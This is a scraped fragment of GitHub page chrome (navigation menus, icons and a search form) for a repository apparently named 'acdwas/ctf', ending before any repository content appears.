<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-shield-check color-fg-subtle mr-3"> <path d="M16.53 9.78a.75.75 0 0 0-1.06-1.06L11 13.19l-1.97-1.97a.75.75 0 0 0-1.06 1.06l2.5 2.5a.75.75 0 0 0 1.06 0l5-5Z"></path><path d="m12.54.637 8.25 2.675A1.75 1.75 0 0 1 22 4.976V10c0 6.19-3.771 10.704-9.401 12.83a1.704 1.704 0 0 1-1.198 0C5.77 20.705 2 16.19 2 10V4.976c0-.758.489-1.43 1.21-1.664L11.46.637a1.748 1.748 0 0 1 1.08 0Zm-.617 1.426-8.25 2.676a.249.249 0 0 0-.173.237V10c0 5.46 3.28 9.483 8.43 11.426a.199.199 0 0 0 .14 0C17.22 19.483 20.5 15.461 20.5 10V4.976a.25.25 0 0 0-.173-.237l-8.25-2.676a.253.253 0 0 0-.154 0Z"></path></svg> <div> <div class="color-fg-default h4">Security</div> Find and fix vulnerabilities </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-codespaces color-fg-subtle mr-3"> <path d="M3.5 3.75C3.5 2.784 4.284 2 5.25 2h13.5c.966 0 1.75.784 1.75 1.75v7.5A1.75 1.75 0 0 1 18.75 13H5.25a1.75 1.75 0 0 1-1.75-1.75Zm-2 12c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v4a1.75 1.75 0 0 1-1.75 1.75H3.25a1.75 1.75 0 0 1-1.75-1.75ZM5.25 3.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h13.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Zm-2 12a.25.25 0 0 0-.25.25v4c0 .138.112.25.25.25h17.5a.25.25 0 0 0 .25-.25v-4a.25.25 0 0 0-.25-.25Z"></path><path d="M10 17.75a.75.75 0 0 1 .75-.75h6.5a.75.75 0 0 1 0 1.5h-6.5a.75.75 0 0 1-.75-.75Zm-4 0a.75.75 0 0 1 .75-.75h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1-.75-.75Z"></path></svg> <div> <div class="color-fg-default h4">Codespaces</div> Instant dev environments </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-copilot color-fg-subtle mr-3"> <path d="M9.75 14a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Zm4.5 0a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Z"></path><path d="M12 2c2.214 0 4.248.657 5.747 1.756.136.099.268.204.397.312.584.235 1.077.546 1.474.952.85.869 1.132 2.037 1.132 3.368 0 .368-.014.733-.052 1.086l.633 1.478.043.022A4.75 4.75 0 0 1 24 15.222v1.028c0 .529-.309.987-.565 1.293-.28.336-.636.653-.966.918a13.84 13.84 0 0 1-1.299.911l-.024.015-.006.004-.039.025c-.223.135-.45.264-.68.386-.46.245-1.122.571-1.941.895C16.845 21.344 14.561 22 12 22c-2.561 0-4.845-.656-6.479-1.303a19.046 19.046 0 0 1-1.942-.894 14.081 14.081 0 0 1-.535-.3l-.144-.087-.04-.025-.006-.004-.024-.015a13.16 13.16 0 0 1-1.299-.911 6.913 6.913 0 0 1-.967-.918C.31 17.237 0 16.779 0 16.25v-1.028a4.75 4.75 0 0 1 2.626-4.248l.043-.022.633-1.478a10.195 10.195 0 0 1-.052-1.086c0-1.331.282-2.498 1.132-3.368.397-.406.89-.717 1.474-.952.129-.108.261-.213.397-.312C7.752 2.657 9.786 2 12 2Zm-8 9.654v6.669a17.59 17.59 0 0 0 2.073.98C7.595 19.906 9.686 20.5 12 20.5c2.314 0 4.405-.594 5.927-1.197a17.59 17.59 0 0 0 2.073-.98v-6.669l-.038-.09c-.046.061-.095.12-.145.177-.793.9-2.057 1.259-3.782 1.259-1.59 0-2.738-.544-3.508-1.492a4.323 4.323 0 0 1-.355-.508h-.344a4.323 4.323 0 0 1-.355.508C10.704 12.456 9.555 13 7.965 13c-1.725 0-2.989-.359-3.782-1.259a3.026 3.026 0 0 1-.145-.177Zm6.309-1.092c.445-.547.708-1.334.851-2.301.057-.357.087-.718.09-1.079v-.031c-.001-.762-.166-1.26-.43-1.568l-.008-.01c-.341-.391-1.046-.689-2.533-.529-1.505.163-2.347.537-2.824 1.024-.462.473-.705 1.18-.705 2.32 0 .605.044 1.087.135 1.472.092.384.231.672.423.89.365.413 1.084.75 2.657.75.91 0 1.527-.223 1.964-.564.14-.11.268-.235.38-.374Zm2.504-2.497c.136 1.057.403 1.913.878 2.497.442.545 1.134.938 2.344.938 1.573 0 2.292-.337 2.657-.751.384-.435.558-1.151.558-2.361 0-1.14-.243-1.847-.705-2.319-.477-.488-1.318-.862-2.824-1.025-1.487-.161-2.192.139-2.533.529-.268.308-.437.808-.438 1.578v.02c.002.299.023.598.063.894Z"></path></svg> <div> <div class="color-fg-default h4">Copilot</div> Write better code with AI </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-code-review color-fg-subtle mr-3"> <path d="M10.3 6.74a.75.75 0 0 1-.04 1.06l-2.908 2.7 2.908 2.7a.75.75 0 1 1-1.02 1.1l-3.5-3.25a.75.75 0 0 1 0-1.1l3.5-3.25a.75.75 0 0 1 1.06.04Zm3.44 1.06a.75.75 0 1 1 1.02-1.1l3.5 3.25a.75.75 0 0 1 0 1.1l-3.5 3.25a.75.75 0 1 1-1.02-1.1l2.908-2.7-2.908-2.7Z"></path><path d="M1.5 4.25c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v12.5a1.75 1.75 0 0 1-1.75 1.75h-9.69l-3.573 3.573A1.458 1.458 0 0 1 5 21.043V18.5H3.25a1.75 1.75 0 0 1-1.75-1.75ZM3.25 4a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h2.5a.75.75 0 0 1 .75.75v3.19l3.72-3.72a.749.749 0 0 1 .53-.22h10a.25.25 0 0 0 .25-.25V4.25a.25.25 0 0 0-.25-.25Z"></path></svg> <div> <div class="color-fg-default h4">Code review</div> Manage code changes </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-issue-opened color-fg-subtle mr-3"> <path d="M12 1c6.075 0 11 4.925 11 11s-4.925 11-11 11S1 18.075 1 12 5.925 1 12 1ZM2.5 12a9.5 9.5 0 0 0 9.5 9.5 9.5 9.5 0 0 0 9.5-9.5A9.5 9.5 0 0 0 12 2.5 9.5 9.5 0 0 0 2.5 12Zm9.5 2a2 2 0 1 1-.001-3.999A2 2 0 0 1 12 14Z"></path></svg> <div> <div class="color-fg-default h4">Issues</div> Plan and track work </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-comment-discussion color-fg-subtle mr-3"> <path d="M1.75 1h12.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 14.25 14H8.061l-2.574 2.573A1.458 1.458 0 0 1 3 15.543V14H1.75A1.75 1.75 0 0 1 0 12.25v-9.5C0 1.784.784 1 1.75 1ZM1.5 2.75v9.5c0 .138.112.25.25.25h2a.75.75 0 0 1 .75.75v2.19l2.72-2.72a.749.749 0 0 1 .53-.22h6.5a.25.25 0 0 0 .25-.25v-9.5a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25Z"></path><path d="M22.5 8.75a.25.25 0 0 0-.25-.25h-3.5a.75.75 0 0 1 0-1.5h3.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 22.25 20H21v1.543a1.457 1.457 0 0 1-2.487 1.03L15.939 20H10.75A1.75 1.75 0 0 1 9 18.25v-1.465a.75.75 0 0 1 1.5 0v1.465c0 .138.112.25.25.25h5.5a.75.75 0 0 1 .53.22l2.72 2.72v-2.19a.75.75 0 0 1 .75-.75h2a.25.25 0 0 0 .25-.25v-9.5Z"></path></svg> <div> <div class="color-fg-default h4">Discussions</div> Collaborate outside of code </div>
Explore
All features
Documentation
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
GitHub Skills
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
Blog
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
</div>
<button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Solutions <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4"> For
Enterprise
Teams
Startups
Education
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
By Solution
CI/CD & Automation
DevOps
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
DevSecOps
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
Case Studies
Customer Stories
Resources
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
</div>
<button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Open Source <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4">
<div> <div class="color-fg-default h4">GitHub Sponsors</div> Fund open source developers </div>
<div> <div class="color-fg-default h4">The ReadME Project</div> GitHub community articles </div>
Repositories
Topics
Trending
Collections
</div>
Pricing
</nav>
<div class="d-lg-flex flex-items-center px-3 px-lg-0 mb-3 mb-lg-0 text-center text-lg-left"> <div class="d-lg-flex min-width-0 mb-2 mb-lg-0">
<div class="header-search flex-auto position-relative js-site-search flex-self-stretch flex-md-self-auto mb-3 mb-md-0 mr-0 mr-md-3 scoped-search site-scoped-search js-jump-to"> <div class="position-relative"> </option></form><form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="Repository" data-scope-id="124655323" data-scoped-search-url="/acdwas/ctf/search" data-owner-scoped-search-url="/users/acdwas/search" data-unscoped-search-url="/search" data-turbo="false" action="/acdwas/ctf/search" accept-charset="UTF-8" method="get"> <label class="form-control header-search-wrapper input-sm p-0 js-chromeless-input-container header-search-wrapper-jump-to position-relative d-flex flex-justify-between flex-items-center"> <input type="text" class="form-control js-site-search-focus header-search-input jump-to-field js-jump-to-field js-site-search-field is-clearable" data-hotkey=s,/ name="q" placeholder="Search" data-unscoped-placeholder="Search GitHub" data-scoped-placeholder="Search" autocapitalize="off" role="combobox" aria-haspopup="listbox" aria-expanded="false" aria-autocomplete="list" aria-controls="jump-to-results" aria-label="Search" data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" spellcheck="false" autocomplete="off" > <input type="hidden" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" value="bHGxNchI966qWZVAhSZOMZnN5OYwSLg8z6kqj14HpwDoj5oqSB0+U6a+xjkIT6V4L6i7J/9vYxTxoCrej3ESlw==" /> <input type="hidden" class="js-site-search-type-field" name="type" > <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1 header-search-key-slash"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg>
<div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container">
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<span>No suggested jump to results</span>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this user </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
</div> </label></form> </div></div>
</div>
<div class="position-relative mr-lg-3 d-lg-inline-block"> Sign in </div>
Sign up </div> </div> </div> </div></header>
</div>
<div id="start-of-content" class="show-on-focus"></div>
<div id="js-flash-container" data-turbo-replace>
